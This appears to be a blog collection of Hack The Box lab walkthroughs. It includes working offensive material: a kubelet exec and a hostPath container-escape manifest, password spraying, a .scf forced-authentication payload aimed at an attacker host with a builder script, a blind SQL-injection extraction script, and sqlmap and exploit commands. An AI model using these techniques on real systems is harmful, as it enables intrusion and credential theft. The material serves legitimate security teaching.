12 posts tagged with "easy"

Steam Cloud

· 4 min read

Task 1

Which containerization framework are the services on TCP ports 2379 and 2380 components of?

Targeting those two ports with nmap -p 2379,2380 <target_ip> shows the services as etcd-client and etcd-server respectively. etcd is the distributed key-value store that Kubernetes uses as its backing store for all cluster data, so the framework is Kubernetes.

Task 2

How many pods are running on the target system?

The kubelet is the agent that runs on every node (the worker machines where pods run) and that the control plane talks to in order to manage those pods. It exposes an HTTPS API on TCP port 10250; if that API is reachable and does not enforce authentication, we can use it to list the pods on the node. We can confirm the port is open with nmap -p 10250 -sS <target_ip>.

To find the number of pods we run curl -k https://<target_ip>:10250/pods (-k because the kubelet's certificate is self-signed). The response is a JSON PodList, which we save to a file and pretty-print for a better overview. Each pod entry carries exactly one status.hostIP field, so counting the matches for "hostIP" in the file gives the number of pods.

Task 3

Which pod in the default namespace allows code execution? Choose from "etcd-steamcloud", "nginx", "kube-controller-manager-steamcloud", and "storage-provisioner".

We can narrow it down by searching the saved JSON for "namespace": "default" and checking which of the four candidates it appears under. The only one of them in the default namespace is nginx, and Task 6 confirms that we can execute commands in it through the kubelet's exec endpoint.

Task 4

In which directory is the service account access token and certificate stored inside a Kubernetes pod?

Looking under the volumeMounts field, we see the directory /var/run/secrets/kubernetes.io/serviceaccount/ mounted from a volume named kube-api-access-zwtvf. Searching for that name under volumes reveals a projected volume with two sources: a serviceAccountToken written to the file token, and a configMap providing the cluster CA certificate as ca.crt. These are the pod's service account token and certificate, which processes in the pod use to authenticate to the Kubernetes API server.

Task 5

When creating a Kubernetes Pod, which Volume type can be used to mount a file or directory from the host's filesystem onto the Pod? Choose from "gcePersistentDisk", "hostPath", "secret", or "emptyDir"

From the same json file, in the pod’s volumeMounts, /root is mounted from a volume named flag. Looking up flag under volumes shows it is defined with "hostPath": { "path": "/opt/flag" }, meaning the volume type is hostPath, which mounts files/directories from the host filesystem into the Pod.
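As an added example (not part of the original writeup), the following Python script performs the checks from Tasks 2 to 5 on a kubelet /pods response: it counts the pods, filters them by namespace, locates the service account mount and resolves every volumeMount to a hostPath volume. The embedded PodList is a constructed sample shaped like the kubelet's response, not the box's actual output; in practice you would pass the saved curl output to load_pods() instead.

```python
import json
from typing import Dict, List, Tuple

# Constructed sample shaped like the kubelet's /pods PodList (not the real box output).
SAMPLE_PODS = json.dumps({
    "kind": "PodList",
    "items": [
        {
            "metadata": {"name": "nginx", "namespace": "default"},
            "spec": {
                "containers": [{
                    "name": "nginx",
                    "volumeMounts": [
                        {"name": "flag", "mountPath": "/root"},
                        {"name": "kube-api-access-zwtvf",
                         "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                         "readOnly": True},
                    ],
                }],
                "volumes": [
                    {"name": "flag", "hostPath": {"path": "/opt/flag"}},
                    {"name": "kube-api-access-zwtvf", "projected": {"sources": [
                        {"serviceAccountToken": {"path": "token"}},
                        {"configMap": {"name": "kube-root-ca.crt",
                                       "items": [{"key": "ca.crt", "path": "ca.crt"}]}},
                    ]}},
                ],
            },
            "status": {"hostIP": "10.10.10.1", "phase": "Running"},
        },
        {
            "metadata": {"name": "storage-provisioner", "namespace": "kube-system"},
            "spec": {
                "containers": [{"name": "storage-provisioner", "volumeMounts": []}],
                "volumes": [{"name": "tmp", "hostPath": {"path": "/tmp"}}],
            },
            "status": {"hostIP": "10.10.10.1", "phase": "Running"},
        },
    ],
})


def load_pods(text: str) -> List[dict]:
    """Parse a PodList document (as returned by GET /pods on the kubelet)."""
    doc = json.loads(text)
    if doc.get("kind") != "PodList":
        raise ValueError("not a PodList document")
    return doc.get("items", [])


def count_pods(text: str) -> int:
    """Task 2: one entry per pod, equivalent to counting status.hostIP matches."""
    return len(load_pods(text))


def pods_in_namespace(text: str, namespace: str) -> List[str]:
    """Task 3: names of the pods scheduled in the given namespace."""
    return [p["metadata"]["name"] for p in load_pods(text)
            if p["metadata"].get("namespace") == namespace]


def service_account_dirs(text: str) -> Dict[str, str]:
    """Task 4: for each pod, where the projected serviceAccountToken volume is mounted."""
    result = {}
    for pod in load_pods(text):
        spec = pod["spec"]
        sa_volumes = {
            v["name"] for v in spec.get("volumes", [])
            if any("serviceAccountToken" in s for s in v.get("projected", {}).get("sources", []))
        }
        for container in spec.get("containers", []):
            for mount in container.get("volumeMounts", []):
                if mount["name"] in sa_volumes:
                    result[pod["metadata"]["name"]] = mount["mountPath"]
    return result


def hostpath_mounts(text: str) -> List[Tuple[str, str, str]]:
    """Task 5: (pod, mountPath, hostPath) for every container mount backed by a hostPath volume.
    hostPath mounts are the first thing to look for when hunting container escapes."""
    found = []
    for pod in load_pods(text):
        spec = pod["spec"]
        host_volumes = {v["name"]: v["hostPath"]["path"]
                        for v in spec.get("volumes", []) if "hostPath" in v}
        for container in spec.get("containers", []):
            for mount in container.get("volumeMounts", []):
                if mount["name"] in host_volumes:
                    found.append((pod["metadata"]["name"], mount["mountPath"],
                                  host_volumes[mount["name"]]))
    return found


if __name__ == "__main__":
    print("pods:", count_pods(SAMPLE_PODS))
    print("default namespace:", pods_in_namespace(SAMPLE_PODS, "default"))
    print("service account dirs:", service_account_dirs(SAMPLE_PODS))
    print("hostPath mounts:", hostpath_mounts(SAMPLE_PODS))
```

Note that hostpath_mounts() only reports hostPath volumes that a container actually mounts; a hostPath volume defined under volumes but never mounted (the constructed tmp volume above) does not expose anything to the container and is left out.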

Task 6

Submit the flag located in the user user's home directory.

We can use the tool kubeletctl to execute into the vulnerable pod with ./kubeletctl_<binary_for_os> --server <target_ip> --port 10250 exec -p nginx -n default -c nginx -- sh -lc '<command>', which runs a shell command inside the nginx container of the nginx pod. If you built kubeletctl from source, the binaries are under the build directory; pick the one matching your operating system. The /root directory in the container is the hostPath volume identified in Task 5, so listing it and reading the flag file there gives the user flag.

Task 7

Submit the flag located in root's home directory.

To answer this we need to escape from the containerised environment to the underlying node. From inside the pod, the directory /var/run/secrets/kubernetes.io/serviceaccount/ holds both the token and the CA certificate, and those credentials let us talk directly to the Kubernetes API server as the pod's service account. If that service account is allowed to create pods in the namespace, we can create a pod that mounts the node's root filesystem (/) inside its container; if it is not, the API server answers the create request with 403 Forbidden.

First, create the pod manifest, for example:

cat > pod-hostfs.json <<'JSON'
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": { "name": "bb2-escape" },
  "spec": {
    "containers": [
      {
        "name": "bb",
        "image": "nginx:1.14.2",
        "imagePullPolicy": "Never",
        "command": ["sh","-lc","sleep 3600000"],
        "volumeMounts": [
          { "name": "host", "mountPath": "/node-host" }
        ]
      }
    ],
    "volumes": [
      { "name": "host", "hostPath": { "path": "/", "type": "Directory" } }
    ]
  }
}
JSON

This pod mounts the node's / directory at /node-host inside the container. imagePullPolicy is set to Never, which only works because the image is already present on the node. Then, after exporting the service account token as TOKEN and the API server URL as APISRV and saving the certificate to a file called ca.crt, create the pod through the API server:

curl --cacert ca.crt -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -X POST "$APISRV/api/v1/namespaces/default/pods" \
  -d @pod-hostfs.json

Then we exec into the new pod with:

./kubeletctl_<binary_for_os> \
  --server <target_ip> --port 10250 \
  exec -p bb2-escape -n default -c bb -- sh -lc 'id && mount | head && ls -la /node-host'

Inside it, /node-host is the node's root filesystem, so the root flag is read with cat /node-host/root/root.txt.

Two Million

· 6 min read

Task 1

How many TCP ports are open?

Running nmap -sS <target_ip> (a SYN scan of the default top 1000 ports, which needs root) we see two open ports on the target.

Task 2

What is the name of the JavaScript file loaded by the /invite page that has to do with invite codes?

Browsing to the target IP, the browser reports that the server cannot be found: the site is served under the hostname 2million.htb, which our machine cannot resolve. After adding a line mapping the target IP to 2million.htb in /etc/hosts (sudo vim /etc/hosts) we can refresh the page and navigate to /invite, where we see a sign-up/login form.

Viewing the page source and looking for JavaScript files, we find one named inviteapi.min.js:

Task 3

What JavaScript function on the invite page returns the first hint about how to get an invite code? Don't include () in the answer.

Opening that file (it is minified, so it helps to beautify it first), we locate the function makeInviteCode, which is the JavaScript function that returns the first hint.

Task 4

The endpoint in makeInviteCode returns encrypted data. That message provides another endpoint to query. That endpoint returns a code value that is encoded with what very common binary to text encoding format. What is the name of that encoding?

First, in the browser's developer-tools console, we call the function with makeInviteCode() and observe the result:

The response names ROT13 as the encoding type of its data field, so decoding that value with any ROT13 decoder gives the message "In order to generate the invite code, make a POST request to /api/v1/invite/generate". We can use fetch in the browser console to query that endpoint:

fetch('/api/v1/invite/generate', {
method: 'POST',
headers: { 'Content-Type': 'application/json' }
})
.then(res => res.json())
.then(data => console.log(data));

The response contains a code value that is Base64-encoded.
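As an added example, not from the original writeup, this Python snippet automates the two decoding steps from Task 4: it reads the declared encoding type from the hint response, decodes the message, pulls the endpoint out of it, and then Base64-decodes the code returned by that endpoint, rejecting values that are not valid Base64. Both embedded responses are constructed samples that only mirror the shape of the real API; the code value is made up.

```python
import base64
import binascii
import codecs
import json
import re
from typing import Tuple

# Constructed sample of a makeInviteCode() response; only the shape mirrors the real API.
HINT_RESPONSE = json.dumps({
    "0": 200, "success": 1,
    "data": {
        "data": "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr",
        "enctype": "ROT13",
    },
})

# Constructed sample of a /api/v1/invite/generate response; the code value is made up.
GENERATE_RESPONSE = json.dumps({
    "0": 200, "success": 1,
    "data": {"code": base64.b64encode(b"TEST-CODE-0000-1111").decode(), "format": "encoded"},
})

ENDPOINT_RE = re.compile(r"(/api/\S+)")


def decode_hint(response_text: str) -> Tuple[str, str]:
    """Decode the hint using the encoding the response declares; return (message, endpoint)."""
    body = json.loads(response_text)["data"]
    enctype = body.get("enctype", "").upper()
    if enctype == "ROT13":
        message = codecs.decode(body["data"], "rot_13")
    else:
        # Do not guess: a different enctype needs a different decoder.
        raise ValueError(f"unhandled enctype: {enctype!r}")
    match = ENDPOINT_RE.search(message)
    if not match:
        raise ValueError("no API endpoint in decoded hint")
    return message, match.group(1)


def decode_invite_code(response_text: str) -> str:
    """Base64-decode the invite code; validate=True rejects anything outside the Base64 alphabet."""
    data = json.loads(response_text)["data"]
    try:
        raw = base64.b64decode(data["code"], validate=True)
    except binascii.Error as exc:
        raise ValueError(f"code is not Base64: {exc}") from exc
    return raw.decode("ascii")


if __name__ == "__main__":
    message, endpoint = decode_hint(HINT_RESPONSE)
    print(message)
    print("POST", endpoint)
    print("invite code:", decode_invite_code(GENERATE_RESPONSE))
```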

Task 5

What is the path to the endpoint the page uses when a user clicks on "Connection Pack"?

First, we Base64-decode the code from the previous task and use it to register an account. After logging in we look for "Connection Pack", which is under the "Access" page. With the developer tools open on the Network tab, we click the button; the Headers tab of the resulting request shows the API endpoint the GET request is sent to.

Task 6

How many API endpoints are there under /api/v1/admin?

While logged in, navigating to /api/v1 returns a listing of the API's endpoints, including those under admin.

Task 7

What API endpoint can change a user account to an admin account?

Inspecting the listing from the previous task, the endpoint we want is /api/v1/admin/settings/update.

Cicada

· 4 min read

Task 1

What is the name of the non-default SMB share that is readable with guest access on Cicada?

Running smbclient -N -L //<target_ip>, which lists shares over a null session (no password), we see two non-default shares named DEV and HR.

Next, to see which one is readable as guest, we try to connect to each. Running smbclient -N //<target_ip>/<share_name> shows that the one we can read is the HR share.

Task 2

What is the name of the file found in the HR share?

As seen in the previous task when listing the contents of the HR share, the file is named "Notice from HR.txt".

Task 3

Which user account is still using the company default password?

To read the file, we download it from the smbclient session with get "Notice from HR.txt". It is a welcome message to a new hire that contains the company default password, but no username.

Next, we enumerate domain users by brute-forcing RIDs over a null session with lookupsid.py anonymous@<target_ip> > lookupsid_output.txt. To keep only the usernames we run grep '(SidTypeUser)' lookupsid_output.txt | awk -F '\\' '{print $2}' | cut -d' ' -f1 > users.txt (awk splits on the backslash of DOMAIN\user, and cut drops the trailing "(SidTypeUser)"). Finally, with the password from the notice we spray it across the user list with netexec smb <target_ip> -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'. One password against many accounts stays well under any lockout threshold, and the hit is michael.wrightson.

Task 4

Which user has left their password in Active Directory metadata?

We dump the AD data with ldapdomaindump -u cicada.htb\\michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' <target_ip>, which writes domain_users.json among other files. Then grep -iE 'pass|key|desc|comment' domain_users.json prints every line containing one of those keywords, which is where a description attribute holding a password shows up.

After finding the password, we check which account it belongs to by spraying it against users.txt from the previous task: netexec smb <target_ip> -u users.txt -p 'aRt$Lp#7t*VQ!3'.
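As an added example that is not part of the original writeup, the Python below does the two parsing jobs of Tasks 3 and 4 without the grep/awk pipelines: it turns lookupsid.py output into a clean user list (optionally dropping computer accounts, which the grep pipeline keeps and which only waste spray attempts) and searches the attributes in an ldapdomaindump-style domain_users.json for credential-looking text, tying each hit to the account that owns it. Both inputs are constructed samples: the domain name is the box's, but the RIDs, most names, the IP and the password in the description are made up, and the JSON only approximates ldapdomaindump's layout.

```python
import json
import re
from typing import List, Tuple

# Constructed lookupsid.py output; domain name from the box, RIDs, IP and most names are made up.
LOOKUPSID_OUTPUT = """\
[*] Brute forcing SIDs at 10.10.10.10
[*] StringBinding ncacn_np:10.10.10.10[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
512: CICADA\\Domain Admins (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1104: CICADA\\michael.wrightson (SidTypeUser)
1105: CICADA\\jane.doe (SidTypeUser)
"""

# "<rid>: DOMAIN\name (SidTypeXxx)"; name may contain spaces (group names do).
SID_LINE_RE = re.compile(r"^\d+:\s+[^\\]+\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$")


def parse_lookupsid(text: str, skip_machine_accounts: bool = True) -> List[str]:
    """Equivalent of grep '(SidTypeUser)' | awk -F '\\' '{print $2}' | cut -d' ' -f1,
    plus an optional filter for computer accounts (names ending in $), which are
    also SidTypeUser but are not worth a spray attempt."""
    users = []
    for line in text.splitlines():
        m = SID_LINE_RE.match(line)
        if not m or m.group("kind") != "SidTypeUser":
            continue
        name = m.group("name")
        if skip_machine_accounts and name.endswith("$"):
            continue
        users.append(name)
    return users


# Constructed entries approximating ldapdomaindump's domain_users.json; the password is made up.
DOMAIN_USERS_JSON = json.dumps([
    {"dn": "CN=michael.wrightson,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["michael.wrightson"], "description": []}},
    {"dn": "CN=jane.doe,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["jane.doe"],
                    "description": ["Just in case I forget my password is Example-Pass-1"]}},
])

KEYWORD_RE = re.compile(r"pass|pwd|key|secret", re.IGNORECASE)


def find_credentials_in_attributes(text: str,
                                   attrs=("description", "info", "comment")) -> List[Tuple[str, str, str]]:
    """Like grep -iE 'pass|key|...' over the dump, but returns (user, attribute, value)
    so the finding is tied to the account that owns it rather than a bare line."""
    hits = []
    for entry in json.loads(text):
        attributes = entry.get("attributes", {})
        sam = (attributes.get("sAMAccountName") or ["?"])[0]
        for attr in attrs:
            for value in attributes.get(attr, []):
                if KEYWORD_RE.search(value):
                    hits.append((sam, attr, value))
    return hits


if __name__ == "__main__":
    print("\n".join(parse_lookupsid(LOOKUPSID_OUTPUT)))
    for user, attr, value in find_credentials_in_attributes(DOMAIN_USERS_JSON):
        print(f"{user}: {attr} = {value}")
```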

Board Light

· 4 min read

Task 1

How many TCP ports are listening on BoardLight?

Running sudo nmap -sS <target_ip> scans the default top 1000 TCP ports on the target (add -p- to cover all 65535).

Task 2

What is the domain name used by the box?

Opening the IP address in a browser, the bottom of the page shows the contact email info@board.htb and the copyright notice "2020 All Rights Reserved By Board.htb". Both point to board.htb as the box's domain.

Task 3

What is the name of the application running on a virtual host of board.htb?

We can use gobuster to brute-force subdomains via virtual host fuzzing. After adding the target IP and board.htb to /etc/hosts, we run gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt.

We find crm.board.htb and add it to /etc/hosts as well. Browsing to it shows the application.

Task 4

What version of Dolibarr is running on BoardLight?

At the top of the login page, the application shows its version as 17.0.0.

Task 5

What is the default password for the admin user on Dolibarr?

Since we are presented with a login page, we try the default credentials admin/admin, which work and take us to the admin's page.

Task 6

What is the 2023 CVE ID for an authenticated vulnerability that can lead to remote code execution in this version of Dolibarr?

Searching the NIST National Vulnerability Database for this Dolibarr version, we find CVE-2023-30253.

Driver

· 6 min read

Task 1

We're prompted for log on credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers?

We use curl -I <target_ip> to fetch only the headers and see the username admin in the realm string of the WWW-Authenticate header.

Task 2

Weak passwords are all too common and this target is no exception. What is the password for this target's login?

Before reaching for automated tools, we try the default, common password admin, and it gets us in. The main page presents an MFP Firmware Update Center.

Task 3

There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection?

The file type asked for here has the .scf extension (Shell Command File). Placed on a writable SMB share, or uploaded through a web form whose contents are later browsed from a Windows host, it makes Explorer fetch the icon referenced in the file from an attacker-controlled UNC path, which forces an outbound SMB authentication. MITRE ATT&CK covers this under T1187 (Forced Authentication).

Task 4

We've intercepted an Net-NTLMv2 hash with Responder. What is the mode in Hashcat required to crack this hash format?

When Responder captures a Net-NTLMv2 hash, it looks like:

USERNAME::DOMAIN:ServerChallenge:NTProofStr:Blob

This structure corresponds to Hashcat mode 5600 (NetNTLMv2), as listed in Hashcat's official example-hashes documentation.

Task 5

What is the tony user's password?

To solve this task, we start Responder with sudo responder -I tun0 and upload an .scf file through the printer upload form; it triggers an SMB authentication when the folder containing it is opened. We create the file as follows:

[Shell]
Command=2
IconFile=\\<host_ip>\share\icon.ico
[Taskbar]
Command=ToggleDesktop

This works: as the web page explains, uploads are reviewed manually, so a user on the target browses to the folder containing our file, Explorer tries to load the icon from our host, and Responder captures the Net-NTLMv2 hash.

As described in the previous task, the full hash string can be cracked with Hashcat mode 5600. We save the hash to a file called tony_hash.txt and run hashcat -m 5600 -a 0 tony_hash.txt /usr/share/wordlists/rockyou.txt, which cracks the password.
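As an added example, not taken from the original writeup, the Python below covers both halves of Tasks 3 to 5: it builds the .scf payload with the correct UNC path and CRLF line endings, and it validates a captured line against the Net-NTLMv2 layout from Task 4 (user, domain, 16-hex-digit server challenge, 32-hex-digit NTProofStr, blob starting with the NTLMv2 response header) before declaring it a hashcat -m 5600 job. The sample hash is constructed: every hex value in it is made up and it is not a real capture.

```python
import re
from typing import Dict, Optional


def build_scf(attacker_ip: str, share: str = "share", icon: str = "icon.ico") -> str:
    """Build the .scf contents from Task 5. Explorer resolves IconFile as soon as the folder
    holding the file is rendered, so the victim's host authenticates to attacker_ip
    without any click. Windows expects CRLF line endings."""
    unc = f"\\\\{attacker_ip}\\{share}\\{icon}"
    return "\r\n".join(["[Shell]", "Command=2", f"IconFile={unc}",
                        "[Taskbar]", "Command=ToggleDesktop", ""])


# USER::DOMAIN:ServerChallenge(16 hex):NTProofStr(32 hex):Blob(hex), Responder's NTLMv2 line.
NETNTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<ntproofstr>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$"
)


def parse_netntlmv2(line: str) -> Optional[Dict[str, str]]:
    """Return the hash fields if the line is a well-formed Net-NTLMv2 capture, else None.
    The blob must start with the NTLMv2 response header (RespType 0x01, HiRespType 0x01)."""
    m = NETNTLMV2_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    if not fields["blob"].lower().startswith("0101"):
        return None
    return fields


def hashcat_mode(line: str) -> Optional[int]:
    """Task 4: a Net-NTLMv2 line is hashcat -m 5600; anything else is left to the operator."""
    return 5600 if parse_netntlmv2(line) else None


# Constructed sample in Responder's format; every hex value is made up, not a real capture.
SAMPLE_HASH = ("tony::DRIVER:1122334455667788:" + "ab" * 16 + ":"
               + "0101000000000000" + "00" * 8 + "cd" * 16 + "00" * 4)

if __name__ == "__main__":
    print(build_scf("10.10.14.5"))
    print(parse_netntlmv2(SAMPLE_HASH))
    print("hashcat mode:", hashcat_mode(SAMPLE_HASH))
```

The blob check matters because a Net-NTLMv1 line (hashcat mode 5500) has a similar colon-separated shape but a 48-hex-digit response instead of the NTProofStr plus blob, and feeding it to mode 5600 only wastes cracking time.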

Task 6

Submit the flag located on the tony user's desktop.

We first list the shares on the target's SMB service (port 445, microsoft-ds) with smbclient -L //<target_ip> -U 'tony', using tony's password from the previous task.

Connecting directly to the C$ administrative share with smbclient //<target_ip>/C$ -U 'tony' is denied. We then try crackmapexec smb <target_ip> -u tony -p 'liltony' --shares.

This confirms that tony has no access to the administrative shares, but the banner shows the host is Windows 10 Enterprise, which ships with WinRM and often has it enabled. We check whether tony can log in over WinRM:

crackmapexec winrm <target_ip> -u tony -p liltony

Since the login works, we connect with evil-winrm -i <target_ip> -u tony -p liltony, navigate to tony's Desktop and read the flag with cat user.txt.

Writeup

· 3 min read

Task 1

Submit user flag.

Opening the target's IP address in a browser, the page states that the site uses DDoS protection, a hint that noisy directory brute-forcing will get us blocked, so we enumerate manually.

/robots.txt reveals a disallowed path called writeup/.

The writeup/ path shows the following page:

Running whatweb <target_ip>/writeup -v against the site identifies the CMS as CMS Made Simple.

We can then try the paths of the CMS's standard directory layout, which can be found in its source tree at http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk/.

Trying admin/ gives a login prompt; the default credentials admin/admin do not get us in.

Next, we try other directories to find the CMS version. doc/CHANGELOG.txt reveals the version to be 2.2.9.1.

Using searchsploit "CMS Made Simple" we find that versions below 2.2.10 are vulnerable to an unauthenticated SQL injection (CVE-2019-9053).

We copy the exploit with searchsploit -m php/webapps/46635.py and run it with python3 46635.py -u http://<target_ip>/writeup/ -c -w rockyou.txt, where -c tells the script to crack the recovered password hash against the given wordlist. The script recovers a username and password. They do not work on the CMS admin login, but reusing them over SSH with ssh <username>@<target_ip> gets us in, and the user flag is in the user's home directory: cat user.txt.

Paper

· 5 min read

Task 1

How many TCP ports are open on the remote host?

nmap -sS <target_ip>

Task 2

What is the domain for the Wordpress blog?

To answer this, we check the information in the HTTP response headers.

curl -I <target_ip>

We can see that the server leaks backend information through the X-Backend-Server header, which contains the hostname of the blog.

Task 3

Which 2019 CVE is the wordpress version vulnerable to?

First we need the WordPress version. We add the domain to the hosts file with sudo vim /etc/hosts.

Then we use wpscan, the WordPress security scanner, to find the version and known vulnerabilities.

wpscan also reports the location of readme.html, which usually discloses the WordPress version, but the version was already identified by the scan. A quick search for that version turns up the 2019 CVE, CVE-2019-17671, which lets unauthenticated users view private and draft posts.

Task 4

What is the secret registration URL of the employee chat system?

We first need to enumerate the directories using gobuster dir.

gobuster dir -u http://office.paper/ -w <word_list>

Navigating to the index.php page we see what looks like a chat system.

Going back to the CVE we found, this version lets an unauthenticated user view private or draft posts. On the blog we also find an interesting post by the user Prinsonmike, which suggests that a draft holds the secret URL; we can use the WordPress vulnerability to read his drafts.

We navigate to http://office.paper/?static=1, which triggers the vulnerability and exposes the draft containing the secret URL.

Devvortex

· 5 min read

Task 1

How many open TCP ports are listening on Devvortex?

We run an nmap scan against the target IP.

nmap -sS <target_ip>

Task 2

What subdomain is configured on the target's web server?

Browsing to the IP address, the site redirects to a hostname that our machine cannot resolve.

Let's edit /etc/hosts so that the target domain resolves to the IP address.

sudo vim /etc/hosts

To find the subdomain we use gobuster vhost, since HTB machines often use name-based virtual hosting, where multiple hostnames are served from a single IP address.

gobuster vhost -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

This finds the subdomain dev.devvortex.htb.

Task 3

What Content Management System (CMS) is running on dev.devvortex.htb?

We need to add the new subdomain to the hosts file as well, so again we run sudo vim /etc/hosts.

To identify the CMS we can use WhatWeb with the aggression level raised: whatweb -a 3 dev.devvortex.htb -v.

This does not reveal the CMS. We dig further with a gobuster dir search for more endpoints.

gobuster dir -u http://dev.devvortex.htb -w common.txt

This finds many endpoints with different status codes that will be useful in the following tasks; one of them is /administrator, which is usually an interesting finding.

Navigating there shows the usual administrator login, which reveals that the CMS is Joomla.

We can also find this in /robots.txt, which lists the paths the site asks crawlers not to index; the list includes Joomla-specific paths.

Good Games

· 5 min read

Task 1

Submit User Flag

We use nmap to find the services on the target machine and see an Apache server on port 80.

nmap -sV target_ip

Opening the site in the browser we see a login page, where we will try to bypass authentication with SQL injection.

Server-Side Template Injection (SSTI), a different class of bug, arises when an application incorporates user-supplied input directly into its server-side templates without proper sanitization or validation. Template engines combine templates with dynamic data to generate pages, so an injected template expression is evaluated on the server.

To find forms that are candidates for SQL injection, run

sqlmap -u "http://10.129.51.14/" --forms --crawl=2 --dbms=mysql

--crawl=CRAWLDEPTH crawls the website starting from the target URL, and --forms tests every form it finds.

We find a total of 8 targets. One of them is the login form; sqlmap auto-fills the blank fields, tries multiple techniques and reports that the email parameter is vulnerable to time-based blind SQL injection.
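As an added example that is not part of the original writeup, the Python below shows in miniature what sqlmap found and automated here: a login that splices the email into the query text next to its parameterised fix, and a boolean oracle built on the vulnerable login that extracts the admin's password hash one character at a time, which is the loop sqlmap's blind techniques run for you (with SLEEP() as the signal in the time-based variant on MySQL). The user table, the admin's credentials and the use of an in-memory SQLite database are all constructed for the example; the box's real database is MySQL.

```python
import hashlib
import sqlite3
from typing import Callable, Optional

# Constructed stand-in for the "main" database's user table; the credentials are made up.
ADMIN_PASSWORD = "Example-Pass-1"


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'admin', 'admin@goodgames.htb', ?)",
                 (md5(ADMIN_PASSWORD),))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """The bug: user input is spliced into the SQL text, so a quote in email rewrites the query."""
    query = f"SELECT name FROM user WHERE email = '{email}' AND password = '{md5(password)}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """The fix: bound parameters keep the input as data, whatever characters it contains."""
    row = conn.execute("SELECT name FROM user WHERE email = ? AND password = ?",
                       (email, md5(password))).fetchone()
    return row[0] if row else None


def extract_hash_blind(oracle: Callable[[str], bool], target_user: str = "admin",
                       length: int = 32) -> str:
    """Recover a hex password hash one character at a time through a boolean oracle.
    The oracle answers whether the injected condition made the login succeed."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            payload = (f"' OR (SELECT substr(password,{pos},1) FROM user "
                       f"WHERE name='{target_user}')='{ch}'-- -")
            if oracle(payload):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered


if __name__ == "__main__":
    conn = make_db()
    bypass = "' OR 1=1-- -"
    print("vulnerable login with payload:", login_vulnerable(conn, bypass, "x"))
    print("parameterised login with payload:", login_safe(conn, bypass, "x"))
    oracle = lambda email: login_vulnerable(conn, email, "x") is not None
    print("blind extraction:", extract_hash_blind(oracle))
```

With a 32-character hex hash the oracle needs at most 512 requests; sqlmap gets the same result with fewer by binary-searching the character value, which is why it finishes blind dumps faster than this loop would.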

After confirming the vulnerability we want to enumerate the database and find the table storing the usernames and passwords to get the user flag.

We can retrieve the database names with the following command, where the * marks the injection point:

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" --dbs

We found 2 available databases named information_schema and main.

Next, we will list the tables from each.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D <database_name> --tables

Starting with the database named main, we find 3 tables: blog, blog_comments and user. We start with the table user.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D main -T user --columns

There we find 4 columns in total, including one named email and one named password, which should give us credentials.

We then run the following command to retrieve that information.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D main -T user -C email,password --dump

We get the admin's email and password hash; after cracking the hash to recover the plaintext password, we log in with those credentials.

Now that we are logged in as admin, we see a gear icon at the top right that redirects to internal-administration.goodgames.htb. We need to edit /etc/hosts (which requires administrative privileges) to point this domain at the target's IP.

Sau

· 4 min read

Task 1

Which is the highest open TCP port on the target machine?

We can use nmap to scan ports in the target machine.

nmap -sS -p- <target_ip>

Task 2

What is the name of the open source software that the application on 55555 is "powered by"?

To find information about the software, we run nmap again with version detection:

nmap -sV -p <target_port> <target_ip>

nmap labels the service as unknown, but the fingerprint it returns contains HTTP headers, so the service is HTTP-based. Part of the response is shown below:

We then open http://<target_ip>:55555 in the browser; at the bottom of the page we find the open source software the application is powered by.

Task 3

What is the version of request-baskets running on Sau?

From the previous task we also see the version of the open source software.

Task 4

What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets?

A quick search on cve.org gives the CVE ID: https://www.cve.org/CVERecord?id=CVE-2023-27163.

Task 5

What is the name of the software that the application running on port 80 is "powered by"?

From the previous task we suspect the SSRF can be used to reach the software on port 80. Server-Side Request Forgery (SSRF) is a vulnerability where an attacker makes a web application send requests from the server to a destination of the attacker's choosing. It typically occurs when an application makes HTTP requests based on user input, which is exactly what request-baskets does: it forwards the requests it receives to a configurable URL.

